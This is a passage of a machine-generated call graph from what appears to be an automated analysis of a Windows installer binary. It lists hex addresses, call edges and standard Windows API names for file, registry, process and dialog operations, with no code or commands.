3887->3889 3891 403be4 DialogBoxParamW 3888->3891 3892 403bce GetClassInfoW RegisterClassW 3888->3892 3889->3863 3890->3888 3893 40140b 2 API calls 3891->3893 3892->3891 3893->3863 3894->3863 3895->3741 3960 406284 lstrcpynW 3896->3960 3898 405c72 3899 405c04 4 API calls 3898->3899 3900 405c78 3899->3900 3901 40369a 3900->3901 3902 406518 5 API calls 3900->3902 3901->3795 3910 406284 lstrcpynW 3901->3910 3908 405c88 3902->3908 3903 405cb9 lstrlenW 3904 405cc4 3903->3904 3903->3908 3906 405b59 3 API calls 3904->3906 3905 4065c7 2 API calls 3905->3908 3907 405cc9 GetFileAttributesW 3906->3907 3907->3901 3908->3901 3908->3903 3908->3905 3909 405ba5 2 API calls 3908->3909 3909->3903 3910->3775 3911->3742 3913 4038b2 3912->3913 3914 4038a4 CloseHandle 3912->3914 3961 4038df 3913->3961 3914->3913 3919->3785 3920->3794 3922 40606b 3921->3922 3923 40605e 3921->3923 3922->3794 4011 405ed0 3923->4011 3926 405db6 GetTickCount GetTempFileNameW 3925->3926 3927 403357 3926->3927 3928 405dec 3926->3928 3927->3731 3928->3926 3928->3927 3929->3813 3930->3815 3932 405bb3 3931->3932 3933 402f49 3932->3933 3934 405bb9 CharPrevW 3932->3934 3935 406284 lstrcpynW 3933->3935 3934->3932 3934->3933 3935->3819 3937 402e82 3936->3937 3938 402e9a 3936->3938 3939 402e92 3937->3939 3940 402e8b DestroyWindow 3937->3940 3941 402ea2 3938->3941 3942 402eaa GetTickCount 3938->3942 3939->3822 3940->3939 3943 40669a 2 API calls 3941->3943 3944 402eb8 CreateDialogParamW ShowWindow 3942->3944 3945 402edb 3942->3945 3946 402ea8 3943->3946 3944->3945 3945->3822 3946->3822 3947->3828 3948->3830 3950 403c5e 3949->3950 3959 4061cb wsprintfW 3950->3959 3952 403ccf 3953 403d03 18 API calls 3952->3953 3955 403cd4 3953->3955 3954 4039ff 3954->3852 3955->3954 3956 4062a6 17 API calls 3955->3956 3956->3955 3957->3849 3958->3854 3959->3952 3960->3898 3962 4038ed 3961->3962 3963 4038b7 3962->3963 3964 4038f2 FreeLibrary GlobalFree 3962->3964 3965 405996 3963->3965 3964->3963 3964->3964 3966 405c61 18 API calls 3965->3966 3967 4059b6 3966->3967 3968 4059d5 3967->3968 3969 4059be DeleteFileW 3967->3969 3971 405af5 3968->3971 4001 406284 lstrcpynW 3968->4001 3970 4036cd OleUninitialize 3969->3970 3970->3751 3970->3752 3971->3970 3978 4065c7 2 API calls 3971->3978 3973 4059fb 3974 405a01 lstrcatW 3973->3974 3975 405a0e 3973->3975 3976 405a14 3974->3976 3977 405ba5 2 API calls 3975->3977 3979 405a24 lstrcatW 3976->3979 3981 405a2f lstrlenW FindFirstFileW 3976->3981 3977->3976 3980 405b1a 3978->3980 3979->3981 3980->3970 3982 405b59 3 API calls 3980->3982 3981->3971 3995 405a51 3981->3995 3983 405b24 3982->3983 3985 40594e 5 API calls 3983->3985 3984 405ad8 FindNextFileW 3988 405aee FindClose 3984->3988 3984->3995 3987 405b30 3985->3987 3989 405b34 3987->3989 3990 405b4a 3987->3990 3988->3971 3989->3970 3993 4052ec 24 API calls 3989->3993 3992 4052ec 24 API calls 3990->3992 3992->3970 3996 405b41 3993->3996 3994 405996 60 API calls 3994->3995 3995->3984 3995->3994 3997 4052ec 24 API calls 3995->3997 3999 4052ec 24 API calls 3995->3999 4000 40604a 36 API calls 3995->4000 4002 406284 lstrcpynW 3995->4002 4003 40594e 3995->4003 3998 40604a 36 API calls 3996->3998 3997->3984 3998->3970 3999->3995 4000->3995 4001->3973 4002->3995 4004 405d55 2 API calls 4003->4004 4005 40595a 4004->4005 4006 40597b 4005->4006 4007 405971 DeleteFileW 4005->4007 4008 405969 RemoveDirectoryW 4005->4008 4006->3995 4009 405977 4007->4009 4008->4009 4009->4006 4010 405987 SetFileAttributesW 4009->4010 4010->4006 4012 405f00 4011->4012 4013 405f26 GetShortPathNameW 4011->4013 4038 405d7a GetFileAttributesW CreateFileW 4012->4038 4015 406045 4013->4015 4016 405f3b 4013->4016 4015->3922 4016->4015 4018 405f43 wsprintfA 4016->4018 4017 405f0a CloseHandle GetShortPathNameW 4017->4015 4019 405f1e 4017->4019 4020 4062a6 17 API calls 4018->4020 4019->4013 4019->4015 4021 405f6b 4020->4021 4039 405d7a GetFileAttributesW CreateFileW 4021->4039 4023 405f78 4023->4015 4024 405f87 GetFileSize GlobalAlloc 4023->4024 4025 405fa9 4024->4025 4026 40603e CloseHandle 4024->4026 4027 405dfd ReadFile 4025->4027 4026->4015 4028 405fb1 4027->4028 4028->4026 4040 405cdf lstrlenA 4028->4040 4031 405fc8 lstrcpyA 4034 405fea 4031->4034 4032 405fdc 4033 405cdf 4 API calls 4032->4033 4033->4034 4035 406021 SetFilePointer 4034->4035 4036 405e2c WriteFile 4035->4036 4037 406037 GlobalFree 4036->4037 4037->4026 4038->4017 4039->4023 4041 405d20 lstrlenA 4040->4041 4042 405d28 4041->4042 4043 405cf9 lstrcmpiA 4041->4043 4042->4031 4042->4032 4043->4042 4044 405d17 CharNextA 4043->4044 4044->4041 4149 402259 4150 402c41 17 API calls 4149->4150 4151 40225f 4150->4151 4152 402c41 17 API calls 4151->4152 4153 402268 4152->4153 4154 402c41 17 API calls 4153->4154 4155 402271 4154->4155 4156 4065c7 2 API calls 4155->4156 4157 40227a 4156->4157 4158 40228b lstrlenW lstrlenW 4157->4158 4163 40227e 4157->4163 4160 4052ec 24 API calls 4158->4160 4159 4052ec 24 API calls 4162 402286 4159->4162 4161 4022c9 SHFileOperationW 4160->4161 4161->4162 4161->4163 4163->4159 4163->4162 4171 40175c 4172 402c41 17 API calls 4171->4172 4173 401763 4172->4173 4174 405da9 2 API calls 4173->4174 4175 40176a 4174->4175 4175->4175 4176 401d5d GetDlgItem GetClientRect 4177 402c41 17 API calls 4176->4177 4178 401d8f LoadImageW SendMessageW 4177->4178 4179 402ac5 4178->4179 4180 401dad DeleteObject 4178->4180 4180->4179 4181 4022dd 4182 4022e4 4181->4182 4184 4022f7 4181->4184 4183 4062a6 17 API calls 4182->4183 4185 4022f1 4183->4185 4186 4058ea MessageBoxIndirectW 4185->4186 4186->4184 4187 405260 4188 405270 4187->4188 4189 405284 4187->4189 4190 405276 4188->4190 4191 4052cd 4188->4191 4192 40528c IsWindowVisible 4189->4192 4198 4052a3 4189->4198 4194 404247 SendMessageW 4190->4194 4193 4052d2 CallWindowProcW 4191->4193 4192->4191 4195 405299 4192->4195 4196 405280 4193->4196 4194->4196 4200 404bb6 SendMessageW 4195->4200 4198->4193 4205 404c36 4198->4205 4201 404c15 SendMessageW 4200->4201 4202 404bd9 GetMessagePos ScreenToClient SendMessageW 4200->4202 4204 404c0d 4201->4204 4203 404c12 4202->4203 4202->4204 4203->4201 4204->4198 4214 406284 lstrcpynW 4205->4214 4207 404c49 4215 4061cb wsprintfW 4207->4215 4209 404c53 4210 40140b 2 API calls 4209->4210 4211 404c5c 4210->4211 4216 406284 lstrcpynW 4211->4216 4213 404c63 4213->4191 4214->4207 4215->4209 4216->4213 4217 401563 4218 402a6b 4217->4218 4221 4061cb wsprintfW 4218->4221 4220 402a70 4221->4220 3387 4023e4 3388 402c41 17 API calls 3387->3388 3389 4023f6 3388->3389 3390 402c41 17 API calls 3389->3390 3391 402400 3390->3391 3404 402cd1 3391->3404 3394 402ac5 3395 402438 3400 402444 3395->3400 3408 402c1f 3395->3408 3396 402c41 17 API calls 3397 40242e lstrlenW 3396->3397 3397->3395 3399 402463 RegSetValueExW 3402 402479 RegCloseKey 3399->3402 3400->3399 3411 403116 3400->3411 3402->3394 3405 402cec 3404->3405 3432 40611f 3405->3432 3409 4062a6 17 API calls 3408->3409 3410 402c34 3409->3410 3410->3400 3412 40312f 3411->3412 3413 40315a 3412->3413 3448 403311 SetFilePointer 3412->3448 3436 4032fb 3413->3436 3417 403177 GetTickCount 3428 40318a 3417->3428 3418 40329b 3419 40329f 3418->3419 3424 4032b7 3418->3424 3421 4032fb ReadFile 3419->3421 3420 403285 3420->3399 3421->3420 3422 4032fb ReadFile 3422->3424 3423 4032fb ReadFile 3423->3428 3424->3420 3424->3422 3425 405e2c WriteFile 3424->3425 3425->3424 3427 4031f0 GetTickCount 3427->3428 3428->3420 3428->3423 3428->3427 3429 403219 MulDiv wsprintfW 3428->3429 3439 4067df 3428->3439 3446 405e2c WriteFile 3428->3446 3430 4052ec 24 API calls 3429->3430 3430->3428 3433 40612e 3432->3433 3434 402410 3433->3434 3435 406139 RegCreateKeyExW 3433->3435 3434->3394 3434->3395 3434->3396 3435->3434 3449 405dfd ReadFile 3436->3449 3440 406804 3439->3440 3441 40680c 3439->3441 3440->3428 3441->3440 3442 406893 GlobalFree 3441->3442 3443 40689c GlobalAlloc 3441->3443 3444 406913 GlobalAlloc 3441->3444 3445 40690a GlobalFree 3441->3445 3442->3443 3443->3440 3443->3441 3444->3440 3444->3441 3445->3444 3447 405e4a 3446->3447 3447->3428 3448->3413 3450 403165 3449->3450 3450->3417 3450->3418 3450->3420 3495 402868 3496 402c41 17 API calls 3495->3496 3497 40286f FindFirstFileW 3496->3497 3498 402897 3497->3498 3502 402882 3497->3502 3503 4061cb wsprintfW 3498->3503 3500 4028a0 3504 406284 lstrcpynW 3500->3504 3503->3500 3504->3502 4222 404c68 GetDlgItem GetDlgItem 4223 404cba 7 API calls 4222->4223 4238 404ed3 4222->4238 4224 404d50 SendMessageW 4223->4224 4225 404d5d DeleteObject 4223->4225 4224->4225 4226 404d66 4225->4226 4228 404d9d 4226->4228 4231 4062a6 17 API calls 4226->4231 4227 404fb7 4230 405063 4227->4230 4233 404ec6 4227->4233 4241 405010 SendMessageW 4227->4241 4229 4041fb 18 API calls 4228->4229 4232 404db1 4229->4232 4235 405075 4230->4235 4236 40506d SendMessageW 4230->4236 4237 404d7f SendMessageW SendMessageW 4231->4237 4240 4041fb 18 API calls 4232->4240 4242 404262 8 API calls 4233->4242 4234 404f44 4234->4227 4243 404fa9 SendMessageW 4234->4243 4244 405087 ImageList_Destroy 4235->4244 4245 40508e 4235->4245 4252 40509e 4235->4252 4236->4235 4237->4226 4238->4227 4238->4234 4239 404bb6 5 API calls 4238->4239 4239->4234 4255 404dbf 4240->4255 4241->4233 4247 405025 SendMessageW 4241->4247 4248 405259 4242->4248 4243->4227 4244->4245 4249 405097 GlobalFree 4245->4249 4245->4252 4246 40520d 4246->4233 4253 40521f ShowWindow GetDlgItem ShowWindow 4246->4253 4251 405038 4247->4251 4249->4252 4250 404e94 GetWindowLongW SetWindowLongW 4254 404ead 4250->4254 4261 405049 SendMessageW 4251->4261 4252->4246 4265 404c36 4 API calls 4252->4265 4267 4050d9 4252->4267 4253->4233 4256 404eb3 ShowWindow 4254->4256 4257 404ecb 4254->4257 4255->4250 4260 404e0f SendMessageW 4255->4260 4262 404e8e 4255->4262 4263 404e4b SendMessageW 4255->4263 4264 404e5c SendMessageW 4255->4264 4273 404230 SendMessageW 4256->4273 4274 404230 SendMessageW 4257->4274 4260->4255 4261->4230 4262->4250 4262->4254 4263->4255 4264->4255 4265->4267 4266 4051e3 InvalidateRect 4266->4246 4268 4051f9 4266->4268 4269 405107 SendMessageW 4267->4269 4272 40511d 4267->4272 4275 404b71 4268->4275 4269->4272 4271 405191 SendMessageW SendMessageW 4271->4272 4272->4266 4272->4271 4273->4233 4274->4238 4278 404aa8 4275->4278 4277 404b86 4277->4246 4279 404ac1 4278->4279 4280 4062a6 17 API calls 4279->4280 4281 404b25 4280->4281 4282 4062a6 17 API calls 4281->4282 4283 404b30 4282->4283 4284 4062a6 17 API calls 4283->4284 4285 404b46 lstrlenW wsprintfW SetDlgItemTextW 4284->4285 4285->4277 4286 401968 4287 402c1f 17 API calls 4286->4287 4288 40196f 4287->4288 4289 402c1f 17 API calls 4288->4289 4290 40197c 4289->4290 4291 402c41 17 API calls 4290->4291 4292 401993 lstrlenW 4291->4292 4294 4019a4 4292->4294 4293 4019e5 4294->4293 4298 406284 lstrcpynW 4294->4298 4296 4019d5 4296->4293 4297 4019da lstrlenW 4296->4297 4297->4293 4298->4296 4299 40166a 4300 402c41 17 API calls 4299->4300 4301 401670 4300->4301 4302 4065c7 2 API calls 4301->4302 4303 401676 4302->4303 4304 40436b lstrlenW 4305 40438a 4304->4305 4306 40438c WideCharToMultiByte 4304->4306 4305->4306 4307 4046ec 4308 404718 4307->4308 4309 404729 4307->4309 4368 4058ce GetDlgItemTextW 4308->4368 4311 404735 GetDlgItem 4309->4311 4317 404794 4309->4317 4313 404749 4311->4313 4312 404723 4315 406518 5 API calls 4312->4315 4319 40475d SetWindowTextW 4313->4319 4324 405c04 4 API calls 4313->4324 4314 404878 4316 404a27 4314->4316 4370 4058ce GetDlgItemTextW 4314->4370 4315->4309 4323 404262 8 API calls 4316->4323 4317->4314 4317->4316 4320 4062a6 17 API calls 4317->4320 4322 4041fb 18 API calls 4319->4322 4325 404808 SHBrowseForFolderW 4320->4325 4321 4048a8 4326 405c61 18 API calls 4321->4326 4327 404779 4322->4327 4328 404a3b 4323->4328 4329 404753 4324->4329 4325->4314 4330 404820 CoTaskMemFree 4325->4330 4331 4048ae 4326->4331 4332 4041fb 18 API calls 4327->4332 4329->4319 4333 405b59 3 API calls 4329->4333 4334 405b59 3 API calls 4330->4334 4371 406284 lstrcpynW 4331->4371 4335 404787 4332->4335 4333->4319 4336 40482d 4334->4336 4369 404230 SendMessageW 4335->4369 4339 404864 SetDlgItemTextW 4336->4339 4344 4062a6 17 API calls 4336->4344 4339->4314 4340 40478d 4342 40665e 5 API calls 4340->4342 4341 4048c5 4343 40665e 5 API calls 4341->4343 4342->4317 4351 4048cc 4343->4351 4345 40484c lstrcmpiW 4344->4345 4345->4339 4348 40485d lstrcatW 4345->4348 4346 40490d 4372 406284 lstrcpynW 4346->4372 4348->4339 4349 404914 4350 405c04 4 API calls 4349->4350 4352 40491a GetDiskFreeSpaceW 4350->4352 4351->4346 4354 405ba5 2 API calls 4351->4354 4356 404965 4351->4356 4355 40493e MulDiv 4352->4355 4352->4356 4354->4351 4355->4356 4357 4049d6 4356->4357 4358 404b71 20 API calls 4356->4358 4359 4049f9 4357->4359 4361 40140b 2 API calls 4357->4361 4360 4049c3 4358->4360 4373 40421d KiUserCallbackDispatcher 4359->4373 4363 4049d8 SetDlgItemTextW 4360->4363 4364 4049c8 4360->4364 4361->4359 4363->4357 4366 404aa8 20 API calls 4364->4366 4365 404a15 4365->4316 4374 404645 4365->4374 4366->4357 4368->4312 4369->4340 4370->4321 4371->4341 4372->4349 4373->4365 4375 404653 4374->4375 4376 404658 SendMessageW 4374->4376 4375->4376 4376->4316 3622 40176f 3623 402c41 17 API calls 3622->3623 3624 401776 3623->3624 3625 401796 3624->3625 3626 40179e 3624->3626 3664 406284 lstrcpynW 3625->3664 3665 406284 lstrcpynW 3626->3665 3629 4017a9 3666 405b59 lstrlenW CharPrevW 3629->3666 3630 40179c 3633 406518 5 API calls 3630->3633 3644 4017bb 3633->3644 3637 4017cd CompareFileTime 3637->3644 3638 40188d 3639 4052ec 24 API calls 3638->3639 3642 401897 3639->3642 3640 4052ec 24 API calls 3643 401879 3640->3643 3641 406284 lstrcpynW 3641->3644 3645 403116 35 API calls 3642->3645 3644->3637 3644->3638 3644->3641 3648 4062a6 17 API calls 3644->3648 3659 401864 3644->3659 3660 405d55 GetFileAttributesW 3644->3660 3663 405d7a GetFileAttributesW CreateFileW 3644->3663 3669 4065c7 FindFirstFileW 3644->3669 3672 4058ea 3644->3672 3646 4018aa 3645->3646 3647 4018be SetFileTime 3646->3647 3649 4018d0 CloseHandle 3646->3649 3647->3649 3648->3644 3649->3643 3650 4018e1 3649->3650 3651 4018e6 3650->3651 3652 4018f9 3650->3652 3653 4062a6 17 API calls 3651->3653 3654 4062a6 17 API calls 3652->3654 3655 4018ee lstrcatW 3653->3655 3656 401901 3654->3656 3655->3656 3658 4058ea MessageBoxIndirectW 3656->3658 3658->3643 3659->3640 3659->3643 3661 405d74 3660->3661 3662 405d67 SetFileAttributesW 3660->3662 3661->3644 3662->3661 3663->3644 3664->3630 3665->3629 3667 4017af lstrcatW 3666->3667 3668 405b75 lstrcatW 3666->3668 3667->3630 3668->3667 3670 4065dd FindClose 3669->3670 3671 4065e8 3669->3671 3670->3671 3671->3644 3673 4058ff 3672->3673 3674 40594b 3673->3674 3675 405913 MessageBoxIndirectW 3673->3675 3674->3644 3675->3674 4377 4027ef 4378 4027f6 4377->4378 4380 402a70 4377->4380 4379 402c1f 17 API calls 4378->4379 4381 4027fd 4379->4381 4382 40280c SetFilePointer 4381->4382 4382->4380 4383 40281c 4382->4383 4385 4061cb wsprintfW 4383->4385 4385->4380 4386 401a72 4387 402c1f 17 API calls 4386->4387 4388 401a7b 4387->4388 4389 402c1f 17 API calls 4388->4389 4390 401a20 4389->4390 3677 401573 3678 401583 ShowWindow 3677->3678 3679 40158c 3677->3679 3678->3679 3680 402ac5 3679->3680 3681 40159a ShowWindow 3679->3681 3681->3680 4398 402df3 4399 402e05 SetTimer 4398->4399 4401 402e1e 4398->4401 4399->4401 4400 402e73 4401->4400 4402 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4401->4402 4402->4400 4403 401cf3 4404 402c1f 17 API calls 4403->4404 4405 401cf9 IsWindow 4404->4405 4406 401a20 4405->4406 4407 4014f5 SetForegroundWindow 4408 402ac5 4407->4408 4409 402576 4410 402c41 17 API calls 4409->4410 4411 40257d 4410->4411 4414 405d7a GetFileAttributesW CreateFileW 4411->4414 4413 402589 4414->4413 3686 401b77 3687 401b84 3686->3687 3688 401bc8 3686->3688 3689 4022e4 3687->3689 3695 401b9b 3687->3695 3690 401bf2 GlobalAlloc 3688->3690 3691 401bcd 3688->3691 3692 4062a6 17 API calls 3689->3692 3693 4062a6 17 API calls 3690->3693 3699 401c0d 3691->3699 3707 406284 lstrcpynW 3691->3707 3694 4022f1 3692->3694 3693->3699 3701 4058ea MessageBoxIndirectW 3694->3701 3705 406284 lstrcpynW 3695->3705 3698 401bdf GlobalFree 3698->3699 3700 401baa 3706 406284 lstrcpynW 3700->3706 3701->3699 3703 401bb9 3708 406284 lstrcpynW 3703->3708 3705->3700 3706->3703 3707->3698 3708->3699 4415 4024f8 4416 402c81 17 API calls 4415->4416 4417 402502 4416->4417 4418 402c1f 17 API calls 4417->4418 4419 40250b 4418->4419 4420 402533 RegEnumValueW 4419->4420 4421 402527 RegEnumKeyW 4419->4421 4423 40288b 4419->4423 4422 402548 RegCloseKey 4420->4422 4421->4422 4422->4423 4425 40167b 4426 402c41 17 API calls 4425->4426 4427 401682 4426->4427 4428 402c41 17 API calls 4427->4428 4429 40168b 4428->4429 4430 402c41 17 API calls 4429->4430 4431 401694 MoveFileW 4430->4431 4432 4016a0 4431->4432 4433 4016a7 4431->4433 4434 401423 24 API calls 4432->4434 4435 4065c7 2 API calls 4433->4435 4437 402250 4433->4437 4434->4437 4436 4016b6 4435->4436 4436->4437 4438 40604a 36 API calls 4436->4438 4438->4432 4439 401e7d 4440 402c41 17 API calls 4439->4440 4441 401e83 4440->4441 4442 402c41 17 API calls 4441->4442 4443 401e8c 4442->4443 4444 402c41 17 API calls 4443->4444 4445 401e95 4444->4445 4446 402c41 17 API calls 4445->4446 4447 401e9e 4446->4447 4448 401423 24 API calls 4447->4448 4449 401ea5 4448->4449 4456 4058b0 ShellExecuteExW 4449->4456 4451 401ee7 4452 40670f 5 API calls 4451->4452 4454 40288b 4451->4454 4453 401f01 CloseHandle 4452->4453 4453->4454 4456->4451 4457 4019ff 4458 402c41 17 API calls 4457->4458 4459 401a06 4458->4459 4460 402c41 17 API calls 4459->4460 4461 401a0f 4460->4461 4462 401a16 lstrcmpiW 4461->4462 4463 401a28 lstrcmpW 4461->4463 4464 401a1c 4462->4464 4463->4464 4465 401000 4466 401037 BeginPaint GetClientRect 4465->4466 4467 40100c DefWindowProcW 4465->4467 4469 4010f3 4466->4469 4470 401179 4467->4470 4471 401073 CreateBrushIndirect FillRect DeleteObject 4469->4471 4472 4010fc 4469->4472 4471->4469 4473 401102 CreateFontIndirectW 4472->4473 4474 401167 EndPaint 4472->4474 4473->4474 4475 401112 6 API calls 4473->4475 4474->4470 4475->4474 4483 401503 4484 40150b 4483->4484 4486 40151e 4483->4486 4485 402c1f 17 API calls 4484->4485 4485->4486 3451 402104 3452 402c41 17 API calls 3451->3452 3453 40210b 3452->3453 3454 402c41 17 API calls 3453->3454 3455 402115 3454->3455 3456 402c41 17 API calls 3455->3456 3457 40211f 3456->3457 3458 402c41 17 API calls 3457->3458 3459 402129 3458->3459 3460 402c41 17 API calls 3459->3460 3462 402133 3460->3462 3461 402172 CoCreateInstance 3466 402191 3461->3466 3462->3461 3463 402c41 17 API calls 3462->3463 3463->3461 3464 401423 24 API calls 3465 402250 3464->3465 3466->3464 3466->3465 4487 402484 4488 402c81 17 API calls 4487->4488 4489 40248e 4488->4489 4490 402c41 17 API calls 4489->4490 4491 402497 4490->4491 4492 4024a2 RegQueryValueExW 4491->4492 4493 40288b 4491->4493 4494 4024c2 4492->4494 4497 4024c8 RegCloseKey 4492->4497 4494->4497 4498 4061cb wsprintfW 4494->4498 4497->4493 4498->4497 3467 401f06 3468 402c41 17 API calls 3467->3468 3469 401f0c 3468->3469 3470 4052ec 24 API calls 3469->3470 3471 401f16 3470->3471 3482 40586d CreateProcessW 3471->3482 3474 401f3f CloseHandle 3478 40288b 3474->3478 3477 401f31 3479 401f41 3477->3479 3480 401f36 3477->3480 3479->3474 3490 4061cb wsprintfW 3480->3490 3483 4058a0 CloseHandle 3482->3483 3484 401f1c 3482->3484 3483->3484 3484->3474 3484->3478 3485 40670f WaitForSingleObject 3484->3485 3486 406729 3485->3486 3487 40673b GetExitCodeProcess 3486->3487 3491 40669a 3486->3491 3487->3477 3490->3474 3492 4066b7 PeekMessageW 3491->3492 3493 4066c7 WaitForSingleObject 3492->3493 3494 4066ad DispatchMessageW 3492->3494 3493->3486 3494->3492 3563 401f8c 3564 402c41 17 API calls 3563->3564 3565 401f93 3564->3565 3566 40665e 5 API calls 3565->3566 3567 401fa2 GetFileVersionInfoSizeW 3566->3567 3568 402ac5 3567->3568 3569 401fbe GlobalAlloc 3567->3569 3569->3568 3570 401fd2 3569->3570 3571 40665e 5 API calls 3570->3571 3572 401fd9 3571->3572 3573 40665e 5 API calls 3572->3573 3575 401fe3 3573->3575 3574 402026 3574->3568 3575->3574 3579 4061cb wsprintfW 3575->3579 3577 402018 3580 4061cb wsprintfW 3577->3580 3579->3577 3580->3574 4499 40190c 4500 401943 4499->4500 4501 402c41 17 API calls 4500->4501 4502 401948 4501->4502 4503 405996 67 API calls 4502->4503 4504 401951 4503->4504 4505 40230c 4506 402314 4505->4506 4507 40231a 4505->4507 4508 402c41 17 API calls 4506->4508 4509 402328 4507->4509 4511 402c41 17 API calls 4507->4511 4508->4507 4510 402336 4509->4510 4512 402c41 17 API calls 4509->4512 4513 402c41 17 API calls 4510->4513 4511->4509 4512->4510 4514 40233f WritePrivateProfileStringW 4513->4514 3588 40238e 3589 4023c1 3588->3589 3590 402396 3588->3590 3592 402c41 17 API calls 3589->3592 3600 402c81 3590->3600 3594 4023c8 3592->3594 3605 402cff 3594->3605 3595 4023a7 3598 402c41 17 API calls 3595->3598 3597 4023d5 3599 4023ae RegDeleteValueW RegCloseKey 3598->3599 3599->3597 3601 402c41 17 API calls 3600->3601 3602 402c98 3601->3602 3603 4060f1 RegOpenKeyExW 3602->3603 3604 40239d 3603->3604 3604->3595 3604->3597 3606 402d13 3605->3606 3607 402d0c 3605->3607 3606->3607 3609 402d44 3606->3609 3607->3597 3610 4060f1 RegOpenKeyExW 3609->3610 3611 402d72 3610->3611 3612 402dec 3611->3612 3616 402d76 3611->3616 3612->3607 3613 402d98 RegEnumKeyW 3614 402daf RegCloseKey 3613->3614 3613->3616 3617 40665e 5 API calls 3614->3617 3615 402dd0 RegCloseKey 3615->3612 3616->3613 3616->3614 3616->3615 3618 402d44 6 API calls 3616->3618 3619 402dbf 3617->3619 3618->3616 3620 402de0 RegDeleteKeyW 3619->3620 3621 402dc3 3619->3621 3620->3612 3621->3612 4515 40698e 4521 406812 4515->4521 4516 40717d 4517 406893 GlobalFree 4518 40689c GlobalAlloc 4517->4518 4518->4516 4518->4521 4519 406913 GlobalAlloc 4519->4516 4519->4521 4520 40690a GlobalFree 4520->4519 4521->4516 4521->4517 4521->4518 4521->4519 4521->4520 4522 40190f 4523 402c41 17 API calls 4522->4523 4524 401916 4523->4524 4525 4058ea MessageBoxIndirectW 4524->4525 4526 40191f 4525->4526 4527 401491 4528 4052ec 24 API calls 4527->4528 4529 401498 4528->4529 4530 401d14 4531 402c1f 17 API calls 4530->4531 4532 401d1b 4531->4532 4533 402c1f 17 API calls 4532->4533 4534 401d27 GetDlgItem 4533->4534 4535 402592 4534->4535 4543 402598 4544 4025c7 4543->4544 4545 4025ac 4543->4545 4547 4025fb 4544->4547 4548 4025cc 4544->4548 4546 402c1f 17 API calls 4545->4546 4553 4025b3 4546->4553 4550 402c41 17 API calls 4547->4550 4549 402c41 17 API calls 4548->4549 4551 4025d3 WideCharToMultiByte lstrlenA 4549->4551 4552 402602 lstrlenW 4550->4552 4551->4553 4552->4553 4554 40262f 4553->4554 4556 405e5b 5 API calls 4553->4556 4557 402645 4553->4557 4555 405e2c WriteFile 4554->4555 4554->4557 4555->4557 4556->4554 4558 40149e 4559 4014ac PostQuitMessage 4558->4559 4560 4022f7 4558->4560 4559->4560 4561 401c1f 4562 402c1f 17 API calls 4561->4562 4563 401c26 4562->4563 4564 402c1f 17 API calls 4563->4564 4565 401c33 4564->4565 4566 401c48 4565->4566 4567 402c41 17 API calls 4565->4567 4568 401c58 4566->4568 4569 402c41 17 API calls 4566->4569 4567->4566 4570 401c63 4568->4570 4571 401caf 4568->4571 4569->4568 4573 402c1f 17 API calls 4570->4573 4572 402c41 17 API calls 4571->4572 4574 401cb4 4572->4574 4575 401c68 4573->4575 4576 402c41 17 API calls 4574->4576 4577 402c1f 17 API calls 4575->4577 4578 401cbd FindWindowExW 4576->4578 4579 401c74 4577->4579 4582 401cdf 4578->4582 4580 401c81 SendMessageTimeoutW 4579->4580 4581 401c9f SendMessageW 4579->4581 4580->4582 4581->4582 4583 402aa0 SendMessageW 4584 402ac5 4583->4584 4585 402aba InvalidateRect 4583->4585 4585->4584 4586 402821 4587 402827 4586->4587 4588 40282f FindClose 4587->4588 4589 402ac5 4587->4589 4588->4589 3276 403d22 3277 403e75 3276->3277 3278 403d3a 3276->3278 3279 403ec6 3277->3279 3280 403e86 GetDlgItem GetDlgItem 3277->3280 3278->3277 3281 403d46 3278->3281 3283 403f20 3279->3283 3293 401389 2 API calls 3279->3293 3282 4041fb 18 API calls 3280->3282 3284 403d51 SetWindowPos 3281->3284 3285 403d64 3281->3285 3288 403eb0 SetClassLongW 3282->3288 3308 403e70 3283->3308 3347 404247 3283->3347 3284->3285 3286 403d81 3285->3286 3287 403d69 ShowWindow 3285->3287 3290 403da3 3286->3290 3291 403d89 DestroyWindow 3286->3291 3287->3286 3292 40140b 2 API calls 3288->3292 3294 403da8 SetWindowLongW 3290->3294 3295 403db9 3290->3295 3346 404184 3291->3346 3292->3279 3296 403ef8 3293->3296 3294->3308 3299 403e62 3295->3299 3300 403dc5 GetDlgItem 3295->3300 3296->3283 3301 403efc SendMessageW 3296->3301 3297 40140b 2 API calls 3320 403f32 3297->3320 3298 404186 DestroyWindow EndDialog 3298->3346 3369 404262 3299->3369 3303 403df5 3300->3303 3304 403dd8 SendMessageW IsWindowEnabled 3300->3304 3301->3308 3302 4041b5 ShowWindow 3302->3308 3307 403dfa 3303->3307 3309 403e02 3303->3309 3311 403e49 SendMessageW 3303->3311 3312 403e15 3303->3312 3304->3303 3304->3308 3306 4062a6 17 API calls 3306->3320 3366 4041d4 3307->3366 3309->3307 3309->3311 3311->3299 3313 403e32 3312->3313 3314 403e1d 3312->3314 3317 40140b 2 API calls 3313->3317 3363 40140b 3314->3363 3315 403e30 3315->3299 3319 403e39 3317->3319 3318 4041fb 18 API calls 3318->3320 3319->3299 3319->3307 3320->3297 3320->3298 3320->3306 3320->3308 3320->3318 3337 4040c6 DestroyWindow 3320->3337 3350 4041fb 3320->3350 3322 403fad GetDlgItem 3323 403fc2 3322->3323 3324 403fca ShowWindow KiUserCallbackDispatcher 3322->3324 3323->3324 3353 40421d KiUserCallbackDispatcher 3324->3353 3326 403ff4 EnableWindow 3331 404008 3326->3331 3327 40400d GetSystemMenu EnableMenuItem SendMessageW 3328 40403d SendMessageW 3327->3328 3327->3331 3328->3331 3331->3327 3354 404230 SendMessageW 3331->3354 3355 403d03 3331->3355 3358 406284 lstrcpynW 3331->3358 3333 40406c lstrlenW 3334 4062a6 17 API calls 3333->3334 3335 404082 SetWindowTextW 3334->3335 3359 401389 3335->3359 3338 4040e0 CreateDialogParamW 3337->3338 3337->3346 3339 404113 3338->3339 3338->3346 3340 4041fb 18 API calls 3339->3340 3341 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3340->3341 3342 401389 2 API calls 3341->3342 3343 404164 3342->3343 3343->3308 3344 40416c ShowWindow 3343->3344 3345 404247 SendMessageW 3344->3345 3345->3346 3346->3302 3346->3308 3348 404250 SendMessageW 3347->3348 3349 40425f 3347->3349 3348->3349 3349->3320 3351 4062a6 17 API calls 3350->3351 3352 404206 SetDlgItemTextW 3351->3352 3352->3322 3353->3326 3354->3331 3356 4062a6 17 API calls 3355->3356 3357 403d11 SetWindowTextW 3356->3357 3357->3331 3358->3333 3361 401390 3359->3361 3360 4013fe 3360->3320 3361->3360 3362 